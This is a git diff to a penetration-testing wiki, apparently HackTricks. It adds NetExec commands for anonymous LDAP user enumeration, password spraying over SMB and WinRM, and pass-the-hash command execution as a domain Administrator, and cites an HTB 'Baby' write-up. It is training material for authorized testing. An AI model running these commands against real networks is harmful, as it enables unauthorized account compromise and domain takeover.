diff --git a/src/network-services-pentesting/pentesting-ldap.md b/src/network-services-pentesting/pentesting-ldap.md index 2228f367e..9c652860c 100644 --- a/src/network-services-pentesting/pentesting-ldap.md +++ b/src/network-services-pentesting/pentesting-ldap.md @@ -93,6 +93,33 @@ ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" + [LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) allow **unauthenticated attackers** to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. This is a **legacy configuration**, and as of Windows Server 2003, only authenticated users are permitted to initiate LDAP requests.\ However, admins may have needed to **set up a particular application to allow anonymous binds** and given out more than the intended amount of access, thereby giving unauthenticated users access to all objects in AD. +### Anonymous LDAP enumeration with NetExec (null bind) + +If null/anonymous bind is allowed, you can pull users, groups, and attributes directly via NetExec’s LDAP module without creds. Useful filters: +- (objectClass=*) to inventory objects under a base DN +- (sAMAccountName=*) to harvest user principals + +Examples: + +```bash +# Enumerate objects from the root DSE (base DN autodetected) +netexec ldap -u '' -p '' --query "(objectClass=*)" "" + +# Dump users with key attributes for spraying and targeting +netexec ldap -u '' -p '' --query "(sAMAccountName=*)" "" + +# Extract just the sAMAccountName field into a list +netexec ldap -u '' -p '' --query "(sAMAccountName=*)" "" \ + | awk -F': ' '/sAMAccountName:/ {print $2}' | sort -u > users.txt +``` + +What to look for: +- sAMAccountName, userPrincipalName +- memberOf and OU placement to scope targeted sprays +- pwdLastSet (temporal patterns), userAccountControl flags (disabled, smartcard required, etc.) + +Note: If anonymous bind is not permitted, you’ll typically see an Operations error indicating a bind is required. + ## Valid Credentials If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using: @@ -300,13 +327,13 @@ You can download **pbis** from here: [https://github.com/BeyondTrust/pbis-open/] ./list-groups-for-user ./lsa list-groups-for-user #Get groups of each user -./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done +./enum-users | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done #Get users of a group ./enum-members --by-name "domain admins" ./lsa enum-members --by-name "domain admins" #Get users of each group -./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done +./enum-groups | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done #Get description of each user ./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n | grep "CN" | while read line; do @@ -428,6 +455,10 @@ Entry_7: Command: nxc ldap -u -p --bloodhound -c All -d --dns-server --dns-tcp ``` -{{#include ../banners/hacktricks-training.md}} +## References +- [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html) +- [NetExec (CME successor)](https://github.com/Pennyw0rth/NetExec) +- [Microsoft: Anonymous LDAP operations to Active Directory are disabled](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) +{{#include ../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/windows-hardening/active-directory-methodology/password-spraying.md b/src/windows-hardening/active-directory-methodology/password-spraying.md index ea805a69a..8fdb8bd54 100644 --- a/src/windows-hardening/active-directory-methodology/password-spraying.md +++ b/src/windows-hardening/active-directory-methodology/password-spraying.md @@ -44,6 +44,23 @@ crackmapexec smb -u users.txt -p passwords.txt crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep + ``` +- Using **NetExec (CME successor)** for targeted, low-noise spraying across SMB/WinRM: + +```bash +# Optional: generate a hosts entry to ensure Kerberos FQDN resolution +netexec smb --generate-hosts-file hosts && cat hosts /etc/hosts | sudo sponge /etc/hosts + +# Spray a single candidate password against harvested users over SMB +netexec smb -u users.txt -p 'Password123!' \ + --continue-on-success --no-bruteforce --shares + +# Validate a hit over WinRM (or use SMB exec methods) +netexec winrm -u -p 'Password123!' -x "whoami" + +# Tip: sync your clock before Kerberos-based auth to avoid skew issues +sudo ntpdate +``` + - Using [**kerbrute**](https://github.com/ropnop/kerbrute) (Go) ```bash @@ -265,6 +282,7 @@ To use any of these tools, you need a user list and a password / a small list of - [www.blackhillsinfosec.com/?p=5296](https://www.blackhillsinfosec.com/?p=5296) - [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying) - [HTB Sendai – 0xdf: from spray to gMSA to DA/SYSTEM](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html) +- [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html) {{#include ../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md b/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md index a41772cfd..02fab4a07 100644 --- a/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md +++ b/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md @@ -141,6 +141,16 @@ reg save HKLM\SAM SAM.SAV secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL ``` +5. Post-extraction: Pass-the-Hash to DA + +```bash +# Use the recovered Administrator NT hash to authenticate without the cleartext password +netexec winrm -u Administrator -H -x "whoami" + +# Or execute via SMB using an exec method +netexec smb -u Administrator -H --exec-method smbexec -x cmd +``` + #### Using wbadmin.exe 1. Set up NTFS filesystem for SMB server on attacker machine and cache SMB credentials on the target machine. @@ -313,9 +323,7 @@ Get-NetGroupMember -Identity "Server Operators" -Recurse - [https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys) - [https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e](https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e) - [https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html](https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html) +- [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html) -{{#include ../../banners/hacktricks-training.md}} - - - +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file